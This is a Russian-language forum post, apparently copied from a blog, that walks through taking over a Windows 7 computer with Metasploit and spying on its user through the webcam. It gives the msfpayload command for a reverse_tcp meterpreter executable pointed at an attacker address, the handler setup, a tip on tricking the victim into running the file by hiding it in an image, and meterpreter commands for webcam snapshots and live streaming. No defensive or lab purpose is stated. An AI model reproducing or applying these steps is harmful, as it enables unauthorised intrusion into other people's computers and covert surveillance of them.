Показать сообщение отдельно
Старый 16.02.2012, 22:28      #1 (ссылка на пост)
levinkv
Активный пользователь
 
Аватар для levinkv
 
Регистрация: 23.01.2012
Сообщений: 54
levinkv скоро придёт к известности
Информация

По умолчанию Metasploit. Взлом Windows 7 (подсматриваем через web-камеру)

Всем привет!

Давайте сегодня поговорим об одном из возможных взломов Windows 7, плюс ко всему будем подглядывать через web-камеру.

Web-камера давным давно стала неотъемлемой частью аппаратного обеспечения компьютера и не важно ноутбук это или стационар. К тому же большой процент пользователей до сих пор используют Windows XP и Windows 7, на которые уязвимостей выше крыши. Ко всему этому можно добавить неумение пользователями настраивать свою ОС, что уже играет немаловажную роль!

Итак, давайте воспользуемся одной из давно найденных, но до сих пор работающих уязвимостей для Windows 7, которая затрагивает UAC (User Account Control). Он ней вы можете прочитать:
Для начала нам нужно, создать вредоносный исполняемый файл run_me.exe, который в BackTrack создается так, как показано ниже:

Код:
# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 X > /root/Desktop/run_me.exe
  • LHOST=192.168.1.5 – IP-адрес атакующего
  • LPORT=4444 – порт атакующего

Click the image to open in full size.

Запускаем Metasploit:

Код:
# msfconsole

Далее вводим команды:

Код:
> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
> set lhost 192.168.1.5
> exploit

Теперь нам нужно, что пользователь запустил файл run_me.exe. Как это добиться уже другая история, как вариант можно засунуть вредоносный файл в другой файл. Например, как скрыть/склеить exe-файл в jpg можете прочитать тут. Это не единственный вариант, поэтому вооружайтесь googl’ом.

После того, когда жертва запустит файл, мы получим контроль над системой с привилегиями SYSTEM. Теперь можно делать все, что угодно! Но сейчас будем подсматривать за пользователем.

Сначала посмотрим, есть ли вообще у него web-камера?

Код:
meterpreter > webcam_list
 1: Logitech Webcam 120

Да нам повезло! Имеется одна web-камера: Logitech Webcam 120.

Теперь сделаем снимок:

Код:
meterpreter > webcam_snap

Click the image to open in full size.

Так же можно попробовать запустить web-камеру в режиме реального времени. Делается это следующей командой:

Код:
meterpreter > run webcam -p /var/www

После чего откроется браузер и вы будете видеть то, что видит камера. Если браузер не откроется, значит откройте его сами и в адресной строке введите:

Код:
/var/www/webcam.html

На этом все! Как видите ничего сложного нет. Если возникнут вопросы, обращайтесь.

Чтобы следить за статьями блога, оформляйте подписку по E-MAIL или RSS.

Дополнительные материалы:

Источник: www.levinkv.ru

Последний раз редактировалось levinkv; 03.04.2012 в 18:21.
levinkv вне форума   Ответить с цитированием
Этот пользователь сказал Спасибо levinkv за это полезное сообщение:
 
Время генерации страницы 0.08244 секунды с 15 запросами